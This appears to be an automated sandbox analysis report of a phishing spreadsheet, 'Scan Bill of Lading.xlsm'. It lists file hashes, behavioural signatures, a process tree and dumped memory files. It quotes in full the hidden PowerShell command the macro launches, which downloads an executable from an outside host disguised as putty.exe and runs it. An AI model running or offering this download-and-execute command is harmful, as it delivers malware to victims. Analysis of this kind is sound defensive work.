Analysis
- max time kernel: 144s
- max time network: 146s
- platform: windows10_x64
- resource: win10v200430
- submitted: 30-06-2020 06:47
Static task: static1
Behavioral task: behavioral1
  Sample: Scan Bill of Lading.xlsm
  Resource: win7
Behavioral task: behavioral2
  Sample: Scan Bill of Lading.xlsm
  Resource: win10v200430
General
- Target: Scan Bill of Lading.xlsm
- Size: 398KB
- MD5: 937aa5650aa985dd443f4a03156967c9
- SHA1: f40cd6481a66c1608a6b97580fe69f2e4904ed6d
- SHA256: f4dcd21a2e0b2f4432b665157a1f934e5063be6bbf7ef5f92b365bbbeca92331
- SHA512: 8113094f933fbd159ec1d37bd7da487e42a515bfba57c6de6c82358223b2e202c6b592ea8fff18568694ca58fdbaebfb60b53f7974743a8c8c9f4abc1af68b93
Malware Config
- Extracted: https://kyivremont.com/vbc.exe
Signatures
- Suspicious behavior: EnumeratesProcesses (20 IoCs)
  Processes:
    pid   process
    3680  powershell.exe  (3 events)
    2924  putty.exe       (1 event)
    3296  WerFault.exe    (16 events)
- Executes dropped EXE (1 IoC)
  Processes:
    pid   process
    2924  putty.exe
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
    description        ioc                                                              process
    Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS               EXCEL.EXE
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  EXCEL.EXE
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU     EXCEL.EXE
- Blacklisted process makes network request (1 IoC)
  Processes:
    flow  pid   process
    16    3680  powershell.exe
- Program crash (1 IoC)
  Processes:
    pid   pid_target  process       target process
    3296  2924        WerFault.exe  putty.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    description        ioc                                                                                 process
    Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                    EXCEL.EXE
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz               EXCEL.EXE
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  EXCEL.EXE
- Suspicious use of SetWindowsHookEx (14 IoCs)
  Processes:
    pid   process
    1508  EXCEL.EXE  (14 events)
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
    pid   process
    1508  EXCEL.EXE
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description                                                                                            pid   pid_target  process         target process
    Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process  3680  1508        powershell.exe  EXCEL.EXE
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes:
    description                       pid   process         target process
    PID 1508 wrote to memory of 3680  1508  EXCEL.EXE       powershell.exe  (2 events)
    PID 3680 wrote to memory of 2924  3680  powershell.exe  putty.exe       (3 events)
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes:
    description                pid   process
    Token: SeDebugPrivilege    3680  powershell.exe
    Token: SeDebugPrivilege    2924  putty.exe
    Token: SeRestorePrivilege  3296  WerFault.exe
    Token: SeBackupPrivilege   3296  WerFault.exe
    Token: SeDebugPrivilege    3296  WerFault.exe
Processes
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (depth 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Scan Bill of Lading.xlsm"
  - Enumerates system info in registry
  - Checks processor information in registry
  - Suspicious use of SetWindowsHookEx
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of WriteProcessMemory
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://kyivremont.com/vbc.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')
  - Suspicious behavior: EnumeratesProcesses
  - Blacklisted process makes network request
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  - Suspicious use of AdjustPrivilegeToken
- C:\Users\Admin\AppData\Local\Temp\putty.exe (depth 3)
  Command line: "C:\Users\Admin\AppData\Local\Temp\putty.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\WerFault.exe (depth 4)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 888
  - Suspicious behavior: EnumeratesProcesses
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
Downloads
- C:\Users\Admin\AppData\Local\Temp\putty.exe
- C:\Users\Admin\AppData\Local\Temp\putty.exe
- memory/2924-17-0x0000000000000000-mapping.dmp
- memory/2924-154-0x0000000000000000-mapping.dmp
- memory/2924-156-0x0000000000000000-mapping.dmp
- memory/2924-10-0x0000000000000000-mapping.dmp
- memory/2924-15-0x0000000000000000-mapping.dmp
- memory/2924-11-0x0000000000000000-mapping.dmp
- memory/2924-12-0x0000000000000000-mapping.dmp
- memory/2924-13-0x0000000000000000-mapping.dmp
- memory/2924-150-0x0000000000000000-mapping.dmp
- memory/2924-16-0x0000000000000000-mapping.dmp
- memory/2924-155-0x0000000000000000-mapping.dmp
- memory/2924-153-0x0000000000000000-mapping.dmp
- memory/2924-14-0x0000000000000000-mapping.dmp
- memory/2924-149-0x0000000000000000-mapping.dmp
- memory/2924-151-0x0000000000000000-mapping.dmp
- memory/2924-152-0x0000000000000000-mapping.dmp
- memory/2924-6-0x0000000000000000-mapping.dmp
- memory/3296-9-0x0000000004D10000-0x0000000004D11000-memory.dmp (Filesize: 4KB)
- memory/3296-159-0x0000000004CD0000-0x0000000004CD1000-memory.dmp (Filesize: 4KB)
- memory/3296-19-0x0000000005490000-0x0000000005491000-memory.dmp (Filesize: 4KB)
- memory/3296-157-0x0000000005560000-0x0000000005561000-memory.dmp (Filesize: 4KB)
- memory/3680-5-0x0000000000000000-mapping.dmp